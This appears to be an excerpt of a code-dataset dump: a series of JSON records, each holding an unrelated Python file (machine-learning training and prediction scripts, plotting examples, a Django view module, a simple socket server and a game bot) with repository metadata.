str(self.context.accepted))\n logging.debug('Provided: %s' % str(self.context.provided))\n\n def MetPercentOfferedSecrets(self, secretcount):\n \"\"\"Determine if we met the secret percentage rule.\"\"\"\n if not self.context.config.hassecrets:\n return True\n else:\n if not self.CountReplyType(['offer']):\n return False\n else:\n perc = float(secretcount) / float(self.CountReplyType(['offer']))\n return not perc < self.context.config.secretratio\n\n def OfferTask(self):\n logging.info('Running OfferTask')\n ouroffer = [x.problemnumbers[0] for x in self.context.our_offered]\n theiroffer = [x.problemnumbers[0] for x in self.context.their_offered]\n justoffered = []\n secretcount = 0\n for x in range(FLAGS.offercount):\n if not self.MetPercentOfferedSecrets(secretcount):\n kind = 'secret'\n secretcount += 1\n else:\n kind = 'all'\n o = offer.Offer.GenerateOffer(ouroffer, theiroffer, justoffered, kind)\n logging.debug('Offering %s for %0.8f' % (o.problemnumbers, o.price))\n justoffered.append(o.problemnumbers[0])\n self.AddReply('offer', o.GetOffer())\n\n if self.ReachedMaxProposals():\n break\n \n def AcceptTask(self):\n logging.info('Running AcceptTask')\n for offer in self.context.their_offered:\n # Meet their needs\n if self.NumPropositions() >= self.context.config.minpropositions:\n logging.info('Met minimum propositions requirement. (%d/%d)'\n % (self.NumPropositions(),\n self.context.config.minpropositions))\n break\n\n if offer.IsGoodBuy():\n logging.info('%s is good buy' % str(offer))\n self.AddReply('accept', offer.GetAccept())\n self.context.endbalance -= offer.price\n else:\n logging.info('%s is bad buy' % str(offer))\n\n def ReofferTask(self):\n logging.info('Running ReofferTask')\n if not self.CountReplyType(['accept']):\n for offer in self.context.their_offered:\n logging.info('Reoffering their id %d' % offer.offerid)\n self.AddReply('reoffer', offer.GetReoffer())\n break\n\n def ProvideTask(self):\n logging.info('Running ProvideTask')\n otheroffers = list(self.context.accepted)\n for accepted in self.context.accepted:\n if self.context.playerid != accepted.provider:\n continue\n logging.info('Providing number %s for offer %d'\n % (accepted.problemnumbers, accepted.offerid))\n p = problem.Problem.GenerateFromAccepted(accepted)\n self.AddReply('provide', p.GetProvide())\n\n def SolveTask(self):\n logging.info('Running SolveTask')\n solvestart = time.time()\n for problem in self.context.provided:\n self.AddReply('solve', problem.Solve())\n self.context.endbalance += problem.profit\n if self.CountReplyType(['solve']):\n logging.info('Solves took %s seconds' % (time.time() - solvestart))\n\n def GenerateReply(self):\n \"\"\"Generate a string reply packet for the administrator.\"\"\"\n logging.info('Generating Game Reply')\n r = 'playertrans[\\n %d\\n' % self.id\n for replytype, reply in self.replies:\n r += ' %s \\n' % reply\n r +=']\\n'\n logging.info('Reply Size: %s' % len(r))\n logging.debug('Reply: %s' % r)\n return r\n\n def RunTasks(self):\n \"\"\"Actually run the game.\"\"\"\n starttime = time.time()\n self.LogGameState()\n logging.info('Running all tasks...')\n map(lambda x: x(), [self.OfferTask, self.AcceptTask, self.ReofferTask,\n self.ProvideTask, self.SolveTask])\n logging.info('Ending Balance: $%0.4f' % self.context.endbalance)\n endtime = time.time()\n logging.info('Gameplay took %s' % (endtime - starttime))\n\n @classmethod\n def Play(cls, gamedata):\n logging.debug('Got: %s' % gamedata)\n for runnumber in range(5):\n try:\n g = cls(gamedata)\n g.RunTasks()\n r = g.GenerateReply()\n return r\n except:\n logging.exception('Encountered MAJOR error during gameplay')\n\n return 'Well, shit.'\n","repo_name":"Sophie-Williams/Athena-SCG-Bot","sub_path":"src/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":6645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"14668721550","text":"\n# coding: utf-8\n# Predict the Image classes Using the weightes stored in the folder\n\n# Import the Required Libraries\nimport os\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator, load_img, img_to_array\nfrom keras.models import Sequential, load_model\nimport numpy as np\nfrom keras.preprocessing import image\n\n\n# Basic Settings\nimg_width, img_height = 150, 150\nmodel_path = 'model.h5'\nmodel_weights_path = 'modelConv2d.h5'\nmodel = load_model(model_path)\nmodel.load_weights(model_weights_path)\n\n\n# Rescale the Image and store it in a folder\ntest_datagen = ImageDataGenerator(rescale=1./255)\n\n\ntest_set = test_datagen.flow_from_directory(\n './test-data/test_61326',\n target_size=(150, 150),\n batch_size=16,\n class_mode=None,\nshuffle=False)\n\n\n# List all the files in the directory\nlist_file=os.listdir(\"./test-data/test_61326/\")\n\n\n\n##Predicting using test data\nfor i in list_file:\n stri = str(i)\n test_image = image.load_img('./test-data/test_61326/' + stri, target_size = (150,150))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image,axis = 0)\n result = model.predict_classes(test_image,verbose=1) # Predicts the class labels\n \n # Convert the predicted class into label and preidct it\n if result==0:\n print('61326_ok_back')\n elif result==1:\n print('61326_ok_front')\n elif result==2:\n print('61326_scratch_mark')\n elif result==3:\n print('61326_slot_damage')\n elif result==4:\n print('61326_thinning')\n elif result==5:\n print('61326_wrinkle')\n else:\n print('none')\n\n","repo_name":"abhiyerasi/JBM-Damage-Detection-AI","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"19084372778","text":"from skimage import data\nfrom skimage import io\nfrom skimage.feature import blob_dog, blob_log, blob_doh\nfrom math import sqrt\nimport numpy as np\nimport itertools\nfrom skimage.color import rgb2gray\n\nimport matplotlib.pyplot as plt\n\nimage = io.imread(\"dipper1.jpg\")\nheight = len(image[0])\nwidth = len(image)\n# image = data.hubble_deep_field()[0:500, 0:500]\nimage_gray = rgb2gray(image)\n\nblobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1)\n\n# Compute radii in the 3rd column.\nblobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)\n# filter blogs greater then 1 radius\nblobs_log = blobs_log[blobs_log[:,2]>1,:]\n\nblobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1)\nblobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)\n# filter blogs greater then 2 radius\nblobs_dog = blobs_dog[blobs_dog[:,2]>2,:]\n\nblobs_doh = blob_doh(image_gray, max_sigma=30, threshold=.01)\n# filter blogs greater then 4 radius\nblobs_doh = blobs_doh[blobs_doh[:,2]>4,:]\n\nblobs_list = [blobs_log, blobs_dog, blobs_doh]\ncolors = ['yellow', 'lime', 'red']\ntitles = ['Laplacian of Gaussian', 'Difference of Gaussian',\n 'Determinant of Hessian']\nsequence = zip(blobs_list, colors, titles)\n\nfig, axes = plt.subplots(1, 3, figsize=(14, 4), sharex=True, sharey=True,\n subplot_kw={'adjustable': 'box-forced'})\nplt.tight_layout()\n\naxes = axes.ravel()\nfor blobs, color, title in sequence:\n ax = axes[0]\n axes = axes[1:]\n ax.set_title(title)\n ax.imshow(image, interpolation='nearest')\n ax.set_axis_off()\n for blob in blobs:\n y, x, r = blob\n c = plt.Circle((x, y), r, color=color, linewidth=2, fill=False)\n ax.add_patch(c)\n points = blobs[:,:-1]\n # for x in np.nditer(points, op_flags=['readwrite']):\n # x = [height - x[0], x[1]]\n\n print(points)\n ax.plot(*zip(*itertools.chain.from_iterable(itertools.combinations(points, 2))),color='brown', marker='o')\n\n# a = np.sort(blobs_log, key=lambda row: row[1])\n# arr = blobs_log[blobs_log[:,2].argsort()]\n# print(blobsr_log[blobs_log[:,2]>1,:])\n# print(blobs_dog[blobs_dog[:,2]>1,:])\n# print(blobs_doh[blobs_doh[:,2]>1,:])\nplt.show()\n\n# https://snipt.net/Miki/sort-array-by-nth-column-in-numpypython/\n# http://stackoverflow.com/questions/6834483/how-do-you-create-line-segments-between-two-points","repo_name":"JoshuaOdell/constellation-recognition","sub_path":"experiments/testingone.py","file_name":"testingone.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"4065537725","text":"# # 2.10-3 Stacked Histograms\nimport plotly as py\nimport plotly.graph_objs as go\nimport numpy as np\npyplt = py.offline.plot\n\ns1 = np.random.RandomState(1)\nx0 = s1.randn(1000)\nx1 = s1.randn(1000)\n\ntrace0 = go.Histogram(\n x=x0\n)\ntrace1 = go.Histogram(\n x=x1\n)\ndata = [trace0, trace1]\nlayout = go.Layout(barmode='stack')\nfig = go.Figure(data=data, layout=layout)\n\npyplt(fig, filename='tmp/stacked_histogram.html')\n","repo_name":"sunshe35/PythonPlotlyCodes","sub_path":"Chapter02/2.10_HistogramsChart_3.py","file_name":"2.10_HistogramsChart_3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"4"} +{"seq_id":"7067526681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 29 02:18:54 2022\n\n@author: Xiao\npix2pix model\n\"\"\"\nimport sys\n# if local\n#sys.path.insert(1,'/home/xiao/Inverse_MS_Design/Python/Common_lib/')\n# if HPC\nsys.path.insert(1,'/home/xshang93/projects/def-yuzou/xshang93/Inverse_MS_Design/Python/Common_lib/')\nimport tensorflow as tf\n\nimport os\nimport time\nimport datetime\nimport numpy as np\n\nfrom image_vis_3D import plot_3D_res\nfrom joblib import load\nfrom data_preprocessing import train_dataset_gen_cGAN, DeNormalizeData\n\n \nwork_dir = './'\ndata_dirs = [\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/10_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/15_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/20_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/25_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/30_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/35_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/40_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/45_cGAN/preprocessed/\",\n \"/home/xshang93/projects/def-yuzou/xshang93/ML/dataset/50_cGAN/preprocessed/\",\n ]\nOUTPUT_CHANNELS = 1 #stress\nsave_name = 'no_norm_20220819'\ntrain_ratio = 0.8\npre_trained_model = load(work_dir+'HP_resultSGD_alldata_200eps.pkl').best_estimator_.model_\n\n\n# Functions to build the generator\n\ndef downsample(filters, transfer_layer='', transfer=True, apply_batchnorm=True):\n initializer = tf.random_normal_initializer(0., 0.02)\n\n result = tf.keras.Sequential()\n\n result.add(\n tf.keras.layers.Conv3D(filters, kernel_size=(3, 3, 3), strides=1, padding='valid',\n kernel_initializer=initializer, use_bias=False))\n # if transfer learning is activated\n if transfer:\n result.trainable = False\n result.set_weights =pre_trained_model.layers[transfer_layer].get_weights()\n if apply_batchnorm:\n result.add(tf.keras.layers.BatchNormalization())\n if transfer:\n result.trainable = False\n result.set_weights =pre_trained_model.layers[transfer_layer+1].get_weights()\n\n result.add(tf.keras.layers.LeakyReLU())\n\n return result\n\ndef upsample(filters, apply_dropout=False):\n initializer = tf.random_normal_initializer(0., 0.02)\n\n result = tf.keras.Sequential()\n result.add(\n tf.keras.layers.Conv3DTranspose(filters, kernel_size=(3, 3, 3), strides=1,\n padding='valid',\n kernel_initializer=initializer,\n use_bias=False))\n\n result.add(tf.keras.layers.BatchNormalization())\n\n if apply_dropout:\n result.add(tf.keras.layers.Dropout(0.5))\n\n result.add(tf.keras.layers.ReLU())\n\n return result\n\ndef Generator():\n inputs = tf.keras.layers.Input(shape=[32, 32, 32, 4])#instantiate a Keras Tensor\n\n down_stack = [\n downsample(32, transfer_layer = 1, transfer = True), # (batch_size, 30, 30, 30, 32)\n downsample(32, transfer_layer = 3,transfer = True), # (batch_size, 28, 28, 28, 32)\n downsample(64, transfer_layer = 5,transfer = True), # (batch_size, 26, 26, 26, 64)\n downsample(128, transfer_layer = 7,transfer = True), # (batch_size, 24, 24, 24, 128)\n ]#put everything in a list and then glue them together\n\n up_stack = [\n# upsample(512, 4, apply_dropout=True), # (batch_size, 2, 2, 1024)\n# upsample(512, 4, apply_dropout=True), # (batch_size, 4, 4, 1024)\n# upsample(512, 4, apply_dropout=True), # (batch_size, 8, 8, 1024)\n upsample(128), # (batch_size, 26, 26, 26, 128)\n upsample(64), # (batch_size, 28, 28, 28, 64)\n upsample(32), # (batch_size, 30, 30, 30, 32)\n upsample(32), # (batch_size, 32, 32, 32, 32)\n ]\n\n initializer = tf.random_normal_initializer(0., 0.02)\n last = tf.keras.layers.Conv3DTranspose(OUTPUT_CHANNELS, kernel_size=(3, 3, 3),\n strides=1,\n padding='valid',\n kernel_initializer=initializer,\n activation='tanh') # (batch_size, 32, 32, 32, 4)\n\n x = inputs\n\n # Downsampling through the model\n skips = []\n for down in down_stack:\n x = down(x)\n skips.append(x)\n\n skips = reversed(skips[:-1])\n\n # Upsampling and establishing the skip connections\n for up, skip in zip(up_stack, skips):\n x = up(x)\n x = tf.keras.layers.Concatenate()([x, skip])\n\n x = last(x)\n\n return tf.keras.Model(inputs=inputs, outputs=x)\n\n# Define the generator loss\n\nLAMBDA = 100\n\nloss_object = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef generator_loss(disc_generated_output, gen_output, target):\n gan_loss = loss_object(tf.ones_like(disc_generated_output), disc_generated_output)\n\n # Mean absolute error\n l1_loss = tf.reduce_mean(tf.abs(target - gen_output))\n\n total_gen_loss = gan_loss + (LAMBDA * l1_loss)\n\n return total_gen_loss, gan_loss, l1_loss\n\n# Functions to build the discriminator\ndef Discriminator():\n initializer = tf.random_normal_initializer(0., 0.02)\n\n inp = tf.keras.layers.Input(shape=[32, 32, 32, 4], name='input_image')\n tar = tf.keras.layers.Input(shape=[32, 32, 32, 1], name='target_image')\n\n x = tf.keras.layers.concatenate([inp, tar]) # (batch_size, 256, 256, channels*2)\n\n down1 = downsample(32, transfer = False, apply_batchnorm = False)(x) # (batch_size, 32, 32, 32, 32)\n down2 = downsample(32,transfer = False)(down1) # (batch_size, 30, 30, 30, 32)\n down3 = downsample(64,transfer = False)(down2) # (batch_size, 28, 28, 28, 64)\n\n zero_pad1 = tf.keras.layers.ZeroPadding3D()(down3) # (batch_size, 26, 26, 26, 128)\n conv = tf.keras.layers.Conv3D(128, kernel_size = (3, 3, 3), strides=1,\n kernel_initializer=initializer,\n use_bias=False)(zero_pad1) # (batch_size, 31, 31, 512)\n\n batchnorm1 = tf.keras.layers.BatchNormalization()(conv)\n\n leaky_relu = tf.keras.layers.LeakyReLU()(batchnorm1)\n\n zero_pad2 = tf.keras.layers.ZeroPadding3D()(leaky_relu) # (batch_size, 33, 33, 512)\n\n last = tf.keras.layers.Conv3D(1, kernel_size = (3, 3, 3), strides=1,\n kernel_initializer=initializer)(zero_pad2) # (batch_size, 30, 30, 1)\n\n return tf.keras.Model(inputs=[inp, tar], outputs=last)\n\n# Define the discriminator loss\ndef discriminator_loss(disc_real_output, disc_generated_output):\n real_loss = loss_object(tf.ones_like(disc_real_output), disc_real_output)\n\n generated_loss = loss_object(tf.zeros_like(disc_generated_output), disc_generated_output)\n\n total_disc_loss = real_loss + generated_loss\n\n return total_disc_loss\n\n# Generate images for checking\ndef generate_images(model, test_input, tar):\n prediction = model(test_input, training=True)\n prediction = DeNormalizeData(prediction,data_min,data_max)\n plot_3D_res(prediction,0,save_dir = './pred')\n plot_3D_res(tar,0,save_dir = './true')\n# \n# \n# Functions for training\n\nlog_dir=\"logs/\"\n\nsummary_writer = tf.summary.create_file_writer(\n log_dir + \"fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\"))\n\n@tf.function\ndef train_step(input_image, target, step):\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n gen_output = generator(input_image, training=True)\n\n disc_real_output = discriminator([input_image, target], training=True)\n disc_generated_output = discriminator([input_image, gen_output], training=True)\n\n gen_total_loss, gen_gan_loss, gen_l1_loss = generator_loss(disc_generated_output, gen_output, target)\n disc_loss = discriminator_loss(disc_real_output, disc_generated_output)\n\n generator_gradients = gen_tape.gradient(gen_total_loss,\n generator.trainable_variables)\n discriminator_gradients = disc_tape.gradient(disc_loss,\n discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(generator_gradients,\n generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(discriminator_gradients,\n discriminator.trainable_variables))\n\n with summary_writer.as_default():\n tf.summary.scalar('gen_total_loss', gen_total_loss, step=step//1000)\n tf.summary.scalar('gen_gan_loss', gen_gan_loss, step=step//1000)\n tf.summary.scalar('gen_l1_loss', gen_l1_loss, step=step//1000)\n tf.summary.scalar('disc_loss', disc_loss, step=step//1000)\n\ndef fit(train_ds, steps):\n# example_input, example_target = next(iter(test_ds.take(1)))\n start = time.time()\n\n for step, (input_image, target) in train_ds.repeat().take(steps).enumerate():\n if (step) % 1000 == 0:\n\n if step != 0:\n print(f'Time taken for 1000 steps: {time.time()-start:.2f} sec\\n')\n\n start = time.time()\n\n# generate_images(generator, example_input, example_target)\n print(f\"Step: {step//1000}k\")\n\n train_step(input_image, target, step)\n\n # Training step\n if (step+1) % 50 == 0:\n print('.', end='', flush=True)\n \n # Save (checkpoint) the model every 20000 steps (u.e. about 4 epochs)\n if (step + 1) % 20000 == 0:\n checkpoint.save(file_prefix=checkpoint_prefix)\n \n# ---------------------------- Body -------------------------------------- #\nif __name__ == \"__main__\":\n # The batch size of 1 produced better results for the U-Net in the original pix2pix experiment\n BUFFER_SIZE = 100000;BATCH_SIZE = 1\n \n # Build input pipelines\n train_input,train_target,test_input,test_target,data_min,data_max = train_dataset_gen_cGAN(save_name,data_dirs,train_ratio,1,5)\n np.save('min_max_'+save_name,[data_min,data_max])\n \n train_dataset = tf.data.Dataset.from_tensor_slices((train_input,train_target))\n train_dataset = train_dataset.shuffle(BUFFER_SIZE)#buffer size should >= dataset size\n train_dataset = train_dataset.batch(BATCH_SIZE)\n \n test_dataset = tf.data.Dataset.from_tensor_slices((test_input,test_target))\n test_dataset = test_dataset.batch(BATCH_SIZE)\n \n # Build the generator\n generator = Generator()\n# tf.keras.utils.plot_model(generator, show_shapes=True, dpi=64)\n #\n ## Test the generator\n #gen_output = generator(tf.reshape(test_input[0],shape=[-1,32,32,32,4]), training=False)#training is false set it into inference mode, where dropout is disabled\n #plot_3D_res(gen_output,0)\n ##\n # Build the discriminator\n discriminator = Discriminator()\n \n ## Test the discriminator\n #disc_out = discriminator([tf.reshape(test_input[0],shape=[-1,32,32,32,4]), gen_output], training=False)#tf.newaxis used to add an aixs to match gen_output\n ##\n # Define the optimizers and checkpoint savers\n generator_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n discriminator_optimizer = tf.keras.optimizers.Adam(2e-4, beta_1=0.5)\n \n checkpoint_dir = './training_checkpoints'\n checkpoint_prefix = os.path.join(checkpoint_dir, \"ckpt\")\n checkpoint = tf.train.Checkpoint(generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n \n # Train the model\n fit(train_dataset, steps=100000)\n \n # save the model\n generator.save(save_name+'_Generator.h5')\n #tf.data.experimental.save(test_dataset, './')\n","repo_name":"xshang93/MsInverseDesign","sub_path":"cGAN_3D.py","file_name":"cGAN_3D.py","file_ext":"py","file_size_in_byte":11663,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"9311078234","text":"# XGBoost baseline for feature engineering.\n# baseline\n# Training result: [192] train-mae:0.051412 holdout-mae:0.051941\n# Public score: 0.0646266\n# baseline norm: y -= y_mean; y /= y_std before train, y_pred *= y_std; y_pred += y_mean\n# Train result: [89] train-mae:0.623345 holdout-mae:0.621901\n# Public score: 0.0645886\n\nimport common_utils as cu\nimport xgboost as xgb\nimport numpy as np\n\n\nclass XGBoostModel(object):\n def __init__(self):\n self.base_model = None\n\n def train(self, X_train, y_train, X_holdout, y_holdout):\n print('Training the model.')\n params = {\n 'eta': 0.033,\n 'max_depth': 6,\n 'subsample': 0.80,\n 'objective': 'reg:linear',\n 'eval_metric': 'mae',\n 'silent': 1\n }\n xgboost_X_train = xgb.DMatrix(X_train, label=y_train)\n xgboost_X_holdout = xgb.DMatrix(X_holdout, label=y_holdout)\n watchlist = [(xgboost_X_train, 'train'), (xgboost_X_holdout, 'holdout')]\n self.base_model = xgb.train(\n params, xgboost_X_train, 10000, watchlist,\n early_stopping_rounds=100, verbose_eval=10)\n\n def predict(self, predict_df):\n return self.base_model.predict(xgb.DMatrix(predict_df))\n\n\ndef run():\n # read train data.\n X, y = cu.get_train_data(encode_non_object=False)\n y_mean, y_std = y.mean(), y.std()\n y -= y_mean; y /= y_std\n\n # get CV from train data.\n X_train, y_train, X_holdout, y_holdout = cu.get_cv(X, y)\n\n # train model.\n xgbm = XGBoostModel()\n xgbm.train(X_train, y_train, X_holdout, y_holdout)\n\n # read test data.\n T = cu.get_test_data(encode_non_object=False)\n\n # predict result.\n print('Predicting.')\n y_pred = xgbm.predict(T[X_train.columns])\n y_pred *= y_std; y_pred += y_mean\n\n # write result.\n cu.write_result(y_pred)\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"YangWenfeng/ZillowPrize-bak","sub_path":"experiment_wenfeng/xgboost_baseline_norm.py","file_name":"xgboost_baseline_norm.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"24844475074","text":"\nimport datetime;\n\n'''\nClass Features:\n- Methods\n- Initialization\n- Help text\n'''\nclass User:\n \"\"\"A member of FriendFace. For now we are\n only storing their name and birthday.\n But soon we will store an uncomfortable\n amount of user information.\"\"\"\n \n def __init__(self, full_name, birthday): # Called every an object is created of this class\n \"\"\"Doc comment for function __init__()\"\"\"\n self.name = full_name;\n self.birthday = birthday; # yyyymmdd\n \n \n # Extract first and last names\n name_pieces = full_name.split(\" \")\n self.first_name = name_pieces[0]\n self.last_name = name_pieces[-1]\n\n #pass # A way to type a line that does nothing\n \n def age(self):\n \"\"\"Return the age of the user in years\"\"\"\n today = datetime.date(2001, 5, 12);\n yyyy = int(self.birthday[0:4])\n mm = int(self.birthday[4:6])\n dd = int(self.birthday[6:8])\n dob = datetime.date(yyyy, mm, dd) #Date of birth\n age_in_days = (today - dob).days;\n age_in_years = age_in_days / 365\n return int(age_in_years)\n#\n\nif __name__ == \"__main__\":\n user = User(\"Dave Bowman\", \"19710315\")\n print(user.name)\n print(user.birthday)\n print(user.first_name)\n print(user.last_name)\n print(user.age())\n#","repo_name":"MattMarti/Practice","sub_path":"Python/Socratica/Classes-and-Objects/User.py","file_name":"User.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"71291504118","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom item.models import Category, Item\nfrom .forms import SignupForm\n# Create your views here.\ndef index(request):\n items = Item.objects.filter(is_sold=False)[:6]\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n 'items': items,\n }\n return render(request,'main/index.html', context)\ndef contact(request):\n categories = Category.objects.all()\n context = {\n 'categories': categories,\n }\n return render(request,'main/contact.html',context)\n\ndef signup(request):\n categories = Category.objects.all()\n if request.method == 'POST':\n form = SignupForm(request.POST)\n\n if form.is_valid():\n form.save()\n\n return redirect('/login/')\n \n else:\n form = SignupForm()\n\n context = {\n 'form': form,\n 'categories': categories,\n }\n return render(request, 'auth/signup.html',context)\n","repo_name":"dedyspooky/Multivendor-ecommerce","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"21144767363","text":"from simtk import openmm as mm\nfrom simtk.openmm import app\nfrom simtk.unit import kelvin, kilojoule, mole, nanometer\nimport torch\n\n\n# Gas constant in kJ / mol / K\nR = 8.314e-3\n\n\nclass OpenMMEnergyAdaptor(torch.autograd.Function):\n @staticmethod\n def forward(ctx, input, openmm_context, temperature):\n device = input.device\n n_batch = input.shape[0]\n n_dim = input.shape[1]\n energies = torch.zeros((n_batch, 1))\n forces = torch.zeros((n_batch, n_dim))\n\n kBT = R * temperature\n input = input.cpu().detach().numpy()\n for i in range(n_batch):\n # reshape the coordinates and send to OpenMM\n x = input[i, :].reshape(-1, 3)\n openmm_context.setPositions(x)\n state = openmm_context.getState(getForces=True, getEnergy=True)\n\n # get energy\n energies[i] = (\n state.getPotentialEnergy().value_in_unit(kilojoule / mole) / kBT\n )\n\n # get forces\n f = (\n state.getForces(asNumpy=True).value_in_unit(\n kilojoule / mole / nanometer\n )\n / kBT\n )\n forces[i, :] = torch.from_numpy(-f.reshape(-1).astype(\"float32\"))\n # Save the forces for the backward step, uploading to the gpu if needed\n ctx.save_for_backward(forces.to(device=device))\n return energies.to(device=device)\n\n @staticmethod\n def backward(ctx, grad_output):\n forces, = ctx.saved_tensors\n return forces * grad_output, None, None\n\n\nopenmm_energy = OpenMMEnergyAdaptor.apply\n\n\ndef regularize_energy(energy, energy_cut, energy_max):\n # Fill any NaNs with energy_max\n energy = torch.where(torch.isfinite(energy), energy, energy_max)\n # Cap the energy at energy_max\n energy = torch.where(energy < energy_max, energy, energy_max)\n # Make it logarithmic above energy cut and linear below\n energy = torch.where(\n energy < energy_cut, energy, torch.log(energy - energy_cut + 1) + energy_cut\n )\n return energy\n","repo_name":"maccallumlab/BoltzmannGenerator","sub_path":"boltzmann/protein/openmm_adaptor.py","file_name":"openmm_adaptor.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"4"} +{"seq_id":"17649505176","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy as np\nimport tflearn\nimport tensorflow as tf\nimport random\nimport json\n\n\nwith open('../intents/intents.json') as json_data:\n intents = json.load(json_data)\n\nnltk.download('punkt')\n\nwords = []\nclasses = []\ndocuments = []\nignore_words = ['?']\n# loop through each sentence in our intents patterns\nfor intent in intents['intents']:\n for pattern in intent['patterns']:\n # tokenize each word in the sentence\n w = nltk.word_tokenize(pattern)\n # add to our words list\n words.extend(w)\n # add to documents in our corpus\n documents.append((w, intent['tag']))\n # add to our classes list\n if intent['tag'] not in classes:\n classes.append(intent['tag'])\n\n# stem and lower each word and remove duplicates\nwords = [stemmer.stem(w.lower()) for w in words if w not in ignore_words]\nwords = sorted(list(set(words)))\n\n\ntraining = []\noutput = []\n\noutput_empty = [0] * len(classes)\n\nfor doc in documents:\n bag = []\n\n pattern_words = doc[0]\n pattern_words = [stemmer.stem(word.lower()) for word in pattern_words]\n\n for w in words:\n bag.append(1) if w in pattern_words else bag.append(0)\n\n # output is a '0' for each tag and '1' for current tag\n output_row = list(output_empty)\n output_row[classes.index(doc[1])] = 1\n\n training.append([bag, output_row])\n\nrandom.shuffle(training)\ntraining = np.array(training)\n\ntrain_x = list(training[:,0])\ntrain_y = list(training[:,1])\n\n\ntf.reset_default_graph()\n\nnet = tflearn.input_data(shape=[None, len(train_x[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(train_y[0]), activation='softmax')\nnet = tflearn.regression(net)\n\nmodel = tflearn.DNN(net, tensorboard_dir='tflearn_logs')\n\nmodel.fit(train_x, train_y, n_epoch=1000, batch_size=8, show_metric=True)\nmodel.save('model.tflearn')\n\n\nimport pickle\npickle.dump( {'words':words, 'classes':classes, 'train_x':train_x, 'train_y':train_y}, open( \"training_data\", \"wb\" ) )\n\n","repo_name":"ReynaDoer/Medical-Chatbot","sub_path":"scripts/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"4"} +{"seq_id":"39406451067","text":"# Napisz parę programów - klienta i serwer, w których porównasz czas przesyłu pakietów za pomocą gniazdaTCP i gniazda UDP. Następnie, po przeprowadzonym teście, odpowiedz na pytania:\n\nimport socket\n\n# TCP server\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('localhost', 1234))\ns.listen(5)\n\nwhile True:\n client, addr = s.accept()\n print(f'Connection from {addr}')\n client.send('Hello from server'.encode('utf-8'))\n client.close()\n","repo_name":"jasieqb/pas","sub_path":"cw5/z4/tcp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"38322986313","text":"__author__ = \"Benedict Thompson\"\n__version__ = \"0.1p\"\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"automod\",\n version=__version__,\n author=__author__,\n author_email=\"thomp334@uni.coventry.ac.uk\",\n description=\"An auto-moderator chat-bot\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/4006G2/AutoMod\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n 